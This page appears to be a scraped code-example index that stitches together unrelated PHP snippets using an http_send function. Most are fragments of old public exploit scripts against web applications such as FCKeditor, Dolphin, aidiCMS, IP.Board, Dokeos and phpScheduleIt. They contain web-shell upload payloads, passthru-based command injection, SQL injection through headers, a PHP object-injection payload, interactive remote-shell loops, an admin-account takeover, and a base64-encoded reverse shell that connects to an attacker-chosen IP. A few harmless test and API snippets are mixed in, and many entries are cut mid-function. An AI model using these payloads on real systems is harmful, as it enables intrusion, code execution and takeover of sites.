示例#1
0
function upload()
{
    global $host, $path;
    $connector = "/admin/include/FCKeditor/editor/filemanager/browser/mcpuk/connectors/php/config.php";
    $file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
    foreach ($file_ext as $ext) {
        print "\n[-] Trying to upload with .{$ext} extension...";
        $data = "--12345\r\n";
        $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
        $data .= "Content-Type: application/octet-stream\r\n\r\n";
        $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
        $data .= "--12345--\r\n";
        $packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Length: " . strlen($data) . "\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $data;
        preg_match("/OnUploadCompleted\\((.*),'(.*)'\\)/i", http_send($host, $packet), $html);
        if (!in_array(intval($html[1]), array(0, 201))) {
            die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
        }
        $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $html = http_send($host, $packet);
        if (!eregi("print", $html) and eregi("_code_", $html)) {
            return $ext;
        }
        sleep(1);
    }
    return false;
}
 protected function execute()
 {
     $post = "{\"ver\":\"2\",\"pd\":\"map\",\"im\":\"2\",\"os\":\"android\",\"datafile\":\"@\".dirname(__FILE__).\"/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat\"}";
     $postParam = json_decode($post, true);
     $data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam);
     $res = "{\"errno\":0}";
     $this->assert_json(__LINE__, $data, $res);
 }
 protected function execute()
 {
     $post = "{\"ver\":\"2\",\"pd\":\"map\",\"im\":\"2\",\"os\":\"android\",\"datafile\":\"@/home/map/apps/servertest/lighttpd/htdocs/mysite/application/controllers/20130913100335_861133029533301_XOoGY2L6NDvVw_E3BUS2pe8lB2Lur+3aL7AaN8LHXakeM_2.dat\"}";
     $postParam = json_decode($post, true);
     $data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam);
     $res = "{\"errno\":0}";
     $this->assert_json(__LINE__, $data, $res);
 }
 protected function execute()
 {
     $post = "{\"ver\":\"2\",\"pd\":\"map\",\"im\":\"2\",\"os\":\"android\",\"datafile\":\"@" . dirname(__FILE__) . "/20130913100335.dat\"}";
     $postParam = json_decode($post, true);
     $data = http_send("http://10.99.33.39:8202/ulog/public/up.php", $postParam);
     $res = "{\"errno\":0}";
     $this->assert_json(__LINE__, $data, $res);
 }
示例#5
0
function check_query($sql)
{
    global $host, $path;
    $packet = "GET {$path} HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Referer: {$sql} \r\n";
    $packet .= "Keep-Alive: 300\r\n";
    $packet .= "Connection: keep-alive\r\n\r\n";
    $html = http_send($host, $packet);
    return preg_match("/DENIED/", $html) ? true : false;
}
示例#6
0
function get_path()
{
    global $host, $path;
    $packet = "GET {$path}tiki-rss_error.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    if (!preg_match('/in <b>(.*)tiki-rss/', http_send($host, $packet), $m)) {
        die("\n[-] Path not found!\n");
    }
    return $m[1];
}
示例#7
0
function get_path()
{
    global $host, $path;
    $packet = "GET {$path}../doceboCore/class/class.conf_fw.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    preg_match("/in <b>(.*)<\\/b> on/i", http_send($host, $packet), $found);
    $ret = substr($found[1], 0, strlen($found[1]) - strlen(strstr($found[1], "docebo")));
    $ret .= substr($path, 1);
    return $ret;
}
示例#8
0
function sqs_client_enqueue($data, $config)
{
    $result = array();
    $err = '';
    $variables = array();
    $variables['Action'] = 'SendMessage';
    $variables['MessageBody'] = json_encode($data);
    $variables['Version'] = '2012-11-05';
    $parsed_url = parse_url($config['sqs_queue_url']);
    $headers = array();
    $headers['Host'] = strtolower($parsed_url['host']);
    $headers['X-Amz-Date'] = gmdate(DATE_FORMAT_ISO8601_BASIC);
    $signature = __sqs_client_version_four($config['aws_secret_access_key'], $config['sqs_queue_url'], $variables, $headers, $config['s3_region'], 'post');
    $region = empty($config['sqs_region']) ? empty($config['s3_region']) ? 'us-east-1' : $config['s3_region'] : $config['sqs_region'];
    // fallback to same region as s3 bucket
    $date_str = substr($headers['X-Amz-Date'], 0, 8);
    $headers['Authorization'] = "AWS4-HMAC-SHA256 Credential={$config['aws_access_key_id']}/{$date_str}/{$region}/sqs/aws4_request, SignedHeaders=host;x-amz-date, Signature={$signature}";
    $post_result = http_send($config['sqs_queue_url'], $variables, $headers);
    $data = $post_result['result'];
    if ($data && $config['log_api_response']) {
        log_file("sqs response:\n" . print_r($data, 1), $config);
    }
    if ($post_result['error']) {
        $err = 'Could not make sqs request ' . $config['sqs_queue_url'] . ' ' . $post_result['error'];
    } else {
        if (!$data) {
            $err = 'Got no response from sqs request';
        } else {
            $xml = @simplexml_load_string($data, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NOENT);
            if (!is_object($xml)) {
                $err = 'Could not parse sqs response';
            } else {
                if (sizeof($xml->Error)) {
                    if (!$config['log_api_response']) {
                        log_file("sqs response:\n" . $data, $config);
                    }
                    $err = 'Got error in sqs response';
                } else {
                    if (!(is_object($xml->SendMessageResult) && is_object($xml->SendMessageResult->MessageId))) {
                        $err = 'Got no MessageId in sqs response';
                    } else {
                        $result['id'] = (string) $xml->SendMessageResult->MessageId;
                    }
                }
            }
        }
    }
    if ($err) {
        $result['error'] = $err;
    }
    return $result;
}
示例#9
0
function check_query($sql)
{
    global $host, $path;
    $payload = "gb_name=null&gb_email=foo%40bar.com&task=insert";
    $packet = "POST {$path}index.php?option=guestbook HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Via: {$sql}\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Content-Length: " . strlen($payload) . "\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    return !preg_match("/UNION\\/\\*\\*\\/SELECT/", http_send($host, $packet));
}
示例#10
0
function inject_code()
{
    global $host, $path;
    $code = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
    $payload = "p_user={$code}&p_pass="******"POST {$path}admin/index.php?action=login HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: " . strlen($payload) . "\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    http_send($host, $packet);
}
function inject_php()
{
    global $host, $path, $user, $pass;
    $data = "feed_order=\"]));}print('<<');passthru(base64_decode(\$_SERVER[HTTP_CMD]));print('>>');%23";
    $packet = "POST {$path}set-prefs.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cookie: user_name={$user}; user_password_hash={$pass}\r\n";
    $packet .= "Content-Length: " . strlen($data) . "\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $data;
    if (preg_match("/login.php/", http_send($host, $packet))) {
        die("\n[-] Incorrect username or password!\n");
    }
}
示例#12
0
function login()
{
    global $host, $path, $username, $password;
    $data = "user={$username}&pass={$password}&submit=1&request_uri=foo";
    $packet = "POST {$path}index.php?a=login HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: " . strlen($data) . "\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $data;
    $pattern = "/pass="******"/";
    return preg_match($pattern, http_send($host, $packet));
}
示例#13
0
文件: 6005.php 项目: iusky/fullypwnd
function check_target()
{
    global $host, $path, $prefix;
    print "\n[-] Checking {$host}...";
    $packet = "GET {$path}starnet/addons/slideshow_full.php?album_name=%27 HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    if (preg_match("/FROM (.*)_m/", http_send($host, $packet), $match)) {
        print "vulnerable!\n";
    } else {
        die("not vulnerable!\n\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
    }
    $prefix = $match[1];
}
function check_target()
{
    // see if MySQL version is >= 4.1 (subqueries support) or other error
    global $host, $path;
    print "\n[-] Checking {$host}...";
    $pck = "GET " . $path . "new_images.php?order=id,(SELECT/**/1) HTTP/1.1\r\n";
    $pck .= "Host: " . $host . "\r\n";
    $pck .= "Keep-Alive: 300\r\n";
    $pck .= "Connection: keep-alive\r\n\r\n";
    $buff = http_send($host, $pck);
    if (!strpos($buff, "The LinPHA developers")) {
        die("\n\n[-] Error... Probably wrong MySQL version!\n");
    } else {
        print " OK!\n";
    }
}
print "\n+------------------------------------------------------------+\n";
if ($argc < 5) {
    print "\nUsage......: php {$argv['0']} <host> <path> <username> <password>\n";
    print "\nExample....: php {$argv['0']} localhost / user pass";
    print "\nExample....: php {$argv['0']} localhost /dolphin/ user pass\n";
    die;
}
$host = $argv[1];
$path = $argv[2];
$payload = "ID={$argv[3]}&Password={$argv[4]}";
$packet = "POST {$path}member.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
if (!preg_match("/memberID=([0-9]+).*memberPassword=([0-9a-f]+)/is", http_send($host, $packet), $m)) {
    die("\n[-] Login failed!\n");
}
$phpcode = "1);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD])";
$packet = "GET {$path}member_menu_queries.php?action=get_bubbles_values&bubbles=Friends:{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: memberID={$m[1]}; memberPassword={$m[2]}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
    print "\ndolphin-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") {
        break;
    }
    preg_match("/\r\n\r\n(.*)\\{\"Friends/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
示例#16
0
function random_mkdir()
{
    global $host, $path, $fileman, $rootdir;
    $dirname = uniqid();
    $payload = "new_folder={$dirname}&currentFolderPath={$rootdir}";
    $packet = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: " . strlen($payload) . "\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";
    http_send($host, $packet);
    return $dirname;
}
    return stream_get_contents($sock);
}
print "\n+-----------------------------------------------------+";
print "\n| aidiCMS v3.55 Remote Code Execution Exploit by EgiX |";
print "\n+-----------------------------------------------------+\n";
if ($argc < 3) {
    print "\nUsage......: php {$argv['0']} <host> <path>\n";
    print "\nExample....: php {$argv['0']} localhost /";
    print "\nExample....: php {$argv['0']} localhost /aidicms/\n";
    die;
}
$host = $argv[1];
$path = $argv[2];
$payload = "foo=<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$packet = "POST {$path}modul/tinymce/plugins/ajaxfilemanager/ajax_create_folder.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: " . strlen($payload) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet = "GET {$path}modul/tinymce/plugins/ajaxfilemanager/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1) {
    print "\naidicms-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") {
        break;
    }
    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
$headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n";
$headers .= $payload;
fclose(http_send($host, 80, $headers));
sleep(2);
print "Granting admin privileges for user [ {$newuser} ]\n";
$headers = "GET {$path}admin/review/staff/index.php HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n\r\n";
preg_match_all('/php\\?u=(\\d+)/', http_recv(http_send($host, 80, $headers)), $matches);
if (!is_numeric(max($matches[1]))) {
    die('Failed.');
}
sleep(2);
$payload = "rdo_type=staff&name=1&surname=2&email=3&password={$newpass}&chk_admin=on&save=" . urlencode('Save Changes');
$headers = "POST {$path}admin/edit/index.php?u=" . max($matches[1]) . " HTTP/1.0\r\n";
$headers .= "Host: {$host}\r\n";
$headers .= "Connection: close\r\n";
$headers .= "Cookie: AUTH_COOKIE={$cookie}\r\n";
$headers .= "Content-Type: application/x-www-form-urlencoded\r\n";
$headers .= "Content-Length: " . strlen($payload) . "\r\n\r\n";
$headers .= $payload;
fclose(http_send($host, 80, $headers));
print "Success!\n\n";
print "http://{$host}{$path}login.php\n";
print "user: {$newuser}\n";
print "pass: {$newpass}\n";
?>
 #
 ### [ dun / 2012 ] ###############################
示例#19
0
function set_NowritableServer()
{
    global $host, $path, $prefix, $pwd;
    // we need to set $NowritableServer=1 in /option/php-stats_mode.php
    $s1 = "/con scrittura di files sul Server/";
    $s2 = "/the write files on server mode/";
    $pck = "GET {$path}admin.php?action=preferenze HTTP/1.1\r\n";
    $pck .= "Host: {$host}\r\n";
    $pck .= "Cookie: pass_cookie={$pwd}\r\n";
    $pck .= "Keep-Alive: 300\r\n";
    $pck .= "Connection: keep-alive\r\n\r\n";
    $html = http_send($host, $pck);
    if (preg_match($s1, $html) || preg_match($s2, $html)) {
        $data = "change_mode=1";
        $pck = "POST {$path}admin.php HTTP/1.1\r\n";
        $pck .= "Host: {$host}\r\n";
        $pck .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $pck .= "Content-Length: " . strlen($data) . "\r\n";
        $pck .= "Keep-Alive: 300\r\n";
        $pck .= "Connection: keep-alive\r\n\r\n";
        $pck .= $data;
        http_send($host, $pck);
    }
}
示例#20
0
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) {
    die("\n[-] Upload failed! (Error {$html[1]})\n");
} else {
    print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
}
define(STDIN, fopen("php://stdin", "r"));
while (1) {
    print "\nstack-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit") {
        $packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Cmd: " . base64_encode($cmd) . "\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $output = http_send($host, $packet);
        if (eregi("print", $output) || !eregi("_code_", $output)) {
            die("\n[-] Exploit failed...\n");
        }
        $shell = explode("_code_", $output);
        print "\n{$shell[1]}";
    } else {
        break;
    }
}
?>

# milw0rm.com [2008-05-29]
示例#21
0
文件: sendsms.php 项目: armic/erpts
<head>
<title>SMS Message Sender</title>
</head>
<body bgcolor="#FFFFFF" text="#000000">

<?php 
include "config.inc";
include "functions.inc";
echo $sendTo;
echo "<hr>";
echo $message;
exit;
if ($submit) {
    echo "Sending the SMS Text message <b>\"{$text}\"</b> to the phone <b>{$to}</b>...<br>\n";
    $URL = "/cgi-bin/sendsms?username="******"&password="******"&from=" . GLOBAL_SENDER . "&to={$to}&text=" . urlencode($text);
    http_send($URL, SENDSMS_PORT);
    echo "<address><a href=\"{$PHP_SELF}\">Back to Send SMS</a></address>\n";
} else {
    ?>

<h1>SMS Message Sender</h1>
<form name="sendsms" method="post" action="<?php 
    echo "{$PHP_SELF}";
    ?>
">
<p>
Telephone number:
<br>
<input type="text" size="30" name="to">
</p>
<p>
示例#22
0
$packet = "GET {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : '';
class db_driver_mysql
{
    public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php');
}
# Super bypass by @i0n1c
$payload = urlencode('a:1:{i:0;O:+15:"db_driver_mysql":1:{s:3:"obj";a:2:{s:13:"use_debug_log";i:1;s:9:"debug_log";s:12:"cache/sh.php";}}}');
$phpcode = '<?error_reporting(0);print(___);passthru(base64_decode($_SERVER[HTTP_CMD]));die;?>';
$packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$_prefix}member_id={$payload}\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
$packet = "GET {$path}cache/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
if (preg_match('/<\\?error/', http_send($host, $packet))) {
    die("\n[-] short_open_tag disabled!\n");
}
while (1) {
    print "\nipb-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") {
        break;
    }
    $response = http_send($host, sprintf($packet, base64_encode($cmd)));
    preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
示例#23
0
 protected function execute()
 {
     $data = http_send("http://10.99.33.40:8080/loc-monitor/slave.php?type=reg&ts=10982345&sign=cc&cuid=SLAVE3559A98E6E0894F17F08F4877CD|933 861000141225&os=android&pt=1&ap=map", "");
     $res = "{\"error\":0,\"msg\":\"\",\"data\":{\"sid\":\"25ce7a038f015df67e96231000141225\"},\"t\":23}";
     $this->assert_json(__LINE__, $data, $res);
 }
示例#24
0
文件: 8287.php 项目: iusky/fullypwnd
function upload()
{
    global $host, $path;
    $payload = "--o0oOo0o\r\n";
    $payload .= "Content-Disposition: form-data; name=\"Submit\"\r\n\r\n\"Send\"\r\n";
    $payload .= "--o0oOo0o\r\n";
    $payload .= "Content-Disposition: form-data; name=\"file\"; filename=\"poc.php\"\r\n\r\n";
    $payload .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n";
    $payload .= "--o0oOo0o--\r\n";
    $packet = "POST {$path}?L=interact.file&id=0 HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: " . strlen($payload) . "\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $payload;
    http_send($host, $packet);
    $packet = "GET {$path}system/cache/temp/ HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    if (preg_match("/[0-9]*_poc.php/", http_send($host, $packet), $match)) {
        return $match[0];
    }
    die("\n[-] Directory listing denied\n");
}
示例#25
0
                $table = $reg[1];
            }
            $ex = str_replace("[N]", $k, $sql);
            $txt = getContent(http_send($host, makePacket($path, $ex, $host)));
        }
    }
    print "\n\n [] Table = {$table}\n\n";
    if (!$uid) {
        $sql = "-1+union+select+concat({$s},uid,0x3a,uname,0x3a,pass,{$s}),0+from+{$table}+limit+[N],1";
    } else {
        $sql = "-1+union+select+concat({$s},uid,0x3a,uname,0x3a,pass,{$s}),0+from+{$table}+where+uid={$uid}+limit+[N],1";
    }
    $regs = array();
    $regex = $string . "(.+)" . $string;
    $n = 0;
    $ex = str_replace("[N]", $n, $sql);
    $pck = makePacket($path, $ex, $host);
    $resp = http_send($host, $pck);
    $txt = getContent($resp);
    while (ereg($regex, $txt, $regs)) {
        $users .= $regs[1] . "\n";
        print $regs[1] . "\n";
        $n++;
        $pck = makePacket($path, str_replace("[N]", $n, $sql), $host);
        $resp = http_send($host, $pck);
        $txt = getContent($resp);
    }
    $write = "\n\nVis Intelligendi" . "\n E-Xooport 3.1 SQL Injection Exploit\n" . "http://vis-intelligendi.co.cc\n" . "Host : {$host}\n" . "Path : {$path}\n" . "http://{$host}{$path}{$sql}\n\n" . "table: {$table}\n\n" . $users . "\n\n Vis Intelligendi Magia";
    fwrite(fopen("exooport_log.txt", "w+"), $write);
    print "Check exooport_log.txt";
}
示例#26
0
    die("\n[-] Exploit failed...\n");
}
define(STDIN, fopen("php://stdin", "r"));
while (1) {
    print "\nfluxcms-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit") {
        $packet = "GET {$path}webinc/bxe/scripts/loadsave.php HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Cmd: " . base64_encode($cmd) . "\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $output = http_send($host, $packet);
        if (!preg_match("/_code_/", $output)) {
            die("\n[-] Exploit failed...\n");
        }
        $shell = explode("_code_", $output);
        print "\n" . $shell[1];
    } else {
        break;
    }
}
// backup the original script
$packet = "GET {$path}webinc/bxe/scripts/loadsave.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Back:\r\n";
$packet .= "Connection: close\r\n\r\n";
http_send($host, $packet);
?>

# milw0rm.com [2008-06-09]
示例#27
0
print "\n| Dokeos LMS <= 1.8.5 (reverse shell) Code Injection Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n\n";
if ($argc < 4) {
    print "\nUsage......: php {$argv['0']} <host> <path> <local IP> [port]\n";
    print "\nExample....: php {$argv['0']} localhost /dokeos/ 192.168.0.2";
    print "\nExample....: php {$argv['0']} localhost / 192.168.0.2 12345\n";
    die;
}
$host = $argv[1];
$path = $argv[2];
$ip = $argv[3];
$port = isset($argv[4]) ? (int) $argv[4] : 4444;
// reverse shell based on http://pentestmonkey.net/tools/php-reverse-shell/
$code = "c2V0X3RpbWVfbGltaXQoMCk7CmluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA1KTsKC" . "iRpcCA9ICRfU0VSVkVSW0hUVFBfSVBdOwokcG9ydCA9ICRfU0VSVkVSW0hUVFBfUE9SVF07CiRjaH" . "Vua19zaXplID0gMjA0ODsKCmlmICghKCRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQpKSkgZGl" . "lKCdbZXJyXUNvbm5lY3Rpb24gdG8geyRpcH06eyRwb3J0fSByZWZ1c2VkJyk7CiRkZXNjcmlwdG9y" . "c3BlYyA9IGFycmF5KDAgPT4gYXJyYXkoJ3BpcGUnLCAncicpLCAxID0+IGFycmF5KCdwaXBlJywgJ" . "3cnKSwgMiA9PiBhcnJheSgncGlwZScsICd3JykpOwppZiAoIWlzX3Jlc291cmNlKCgkcHJvY2Vzcy" . "A9IHByb2Nfb3BlbignL2Jpbi9zaCAtaScsICRkZXNjcmlwdG9yc3BlYywgJHBpcGVzKSkpKSBkaWU" . "oJ1tlcnJdQ2FuXCd0IHNwYXduIHNoZWxsJyk7CgpzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1sw" . "XSwgMCk7CnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLCAwKTsKc3RyZWFtX3NldF9ibG9ja" . "2luZygkcGlwZXNbMl0sIDApOwpzdHJlYW1fc2V0X2Jsb2NraW5nKCRzb2NrLCAwKTsKCndoaWxlIC" . "ghZmVvZigkc29jaykgJiYgIWZlb2YoJHBpcGVzWzFdKSkgewoJJHJlYWRfYSA9IGFycmF5KCRzb2N" . "rLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7CgkkbnVtX2NoYW5nZWRfc29ja2V0cyA9IHN0cmVhbV9z" . "ZWxlY3QoJHJlYWRfYSwgJHdyaXRlX2EsICRlcnJvcl9hLCBudWxsKTsKCglpZiAoaW5fYXJyYXkoJ" . "HNvY2ssICRyZWFkX2EpKSB7CgkJJGlucHV0ID0gZnJlYWQoJHNvY2ssICRjaHVua19zaXplKTsKCQ" . "lmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOwoJfQoJaWYgKGluX2FycmF5KCRwaXBlc1sxXSwgJHJ" . "lYWRfYSkpIHsKCQkkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMV0sICRjaHVua19zaXplKTsKCQlmd3Jp" . "dGUoJHNvY2ssICRpbnB1dCk7Cgl9CglpZiAoaW5fYXJyYXkoJHBpcGVzWzJdLCAkcmVhZF9hKSkge" . "woJCSRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOwoJCWZ3cml0ZSgkc29jay" . "wgJGlucHV0KTsKCX0KfQoKZmNsb3NlKCRzb2NrKTsKZmNsb3NlKCRwaXBlc1swXSk7CmZjbG9zZSg" . "kcGlwZXNbMV0pOwpmY2xvc2UoJHBpcGVzWzJdKTsKcHJvY19jbG9zZSgkcHJvY2Vzcyk7CmRpZTsK";
$packet = "GET {$path}whoisonline.php?tablename_column=0];}eval(base64_decode(\$_SERVER[HTTP_CODE]));%23 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Code: {$code}\r\n";
$packet .= "IP: {$ip}\r\n";
$packet .= "Port: {$port}\r\n";
$packet .= "Connection: close\r\n\r\n";
$response = http_send($host, $packet);
if (preg_match("/\\[err\\](.*)/", $response, $match)) {
    die("[-] Exploit failed ({$match[1]})\n");
}
if (preg_match("/<\\/html>/", $response)) {
    die("[-] Exploit failed (No users online)\n");
}
?>

# milw0rm.com [2009-04-21]
示例#28
0
function check_plugin()
{
    global $host, $path, $sid;
    $packet = "GET {$path}%s HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Cookie: pwg_id={$sid}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    // check if the event_tracer plugin isn't installed
    if (preg_match("/not active/", http_send($host, sprintf($packet, "admin.php?page=plugin&section=event_tracer/event_list.php")))) {
        http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=install"));
        http_send($host, sprintf($packet, "admin.php?page=plugins&plugin=event_tracer&action=activate"));
    }
}
示例#29
0
function upload()
{
    global $host, $path, $uploaddir, $file_ext;
    foreach ($file_ext as $ext) {
        print "\n[-] Trying to upload with .{$ext} extension...";
        $data = "--12345\r\n";
        $data .= "Content-Disposition: form-data; name=\"userfile\"; filename=\".php.{$ext}\"\r\n";
        $data .= "Content-Type: application/octet-stream\r\n\r\n";
        $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
        $data .= "--12345--\r\n";
        $packet = "POST {$path}modules/FileManager/postlet/javaUpload.php HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Content-Length: " . strlen($data) . "\r\n";
        $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $packet .= $data;
        $html = http_send($host, $packet);
        if (!eregi("POSTLET:YES", $html)) {
            die("\n[-] Upload failed!\n");
        }
        $packet = "GET {$path}modules/FileManager/postlet/{$uploaddir}.php.{$ext} HTTP/1.0\r\n";
        $packet .= "Host: {$host}\r\n";
        $packet .= "Connection: close\r\n\r\n";
        $html = http_send($host, $packet);
        if (!eregi("print", $html) and eregi("_code_", $html)) {
            return $ext;
        }
        sleep(1);
    }
    return false;
}
示例#30
0
    print "\nUsage......: php {$argv['0']} host path\n";
    print "\nExample....: php {$argv['0']} localhost /";
    print "\nExample....: php {$argv['0']} localhost /phpscheduleit/\n";
    die;
}
$host = $argv[1];
$path = $argv[2];
$payload = "btnSubmit=1&start_date=1').\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die};%%23";
$packet = "POST {$path}reserve.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$path}reserve.php\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Content-Length: " . (strlen($payload) - 1) . "\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
while (1) {
    print "\nphpscheduleit-shell# ";
    $cmd = trim(fgets(STDIN));
    if ($cmd != "exit") {
        $html = http_send($host, sprintf($packet, base64_encode($cmd)));
        $shell = explode("_code_", $html);
        preg_match("/_code_/", $html) ? print "\n{$shell[1]}" : die("\n[-] Exploit failed...\n");
    } else {
        break;
    }
}
?>

# milw0rm.com [2008-10-01]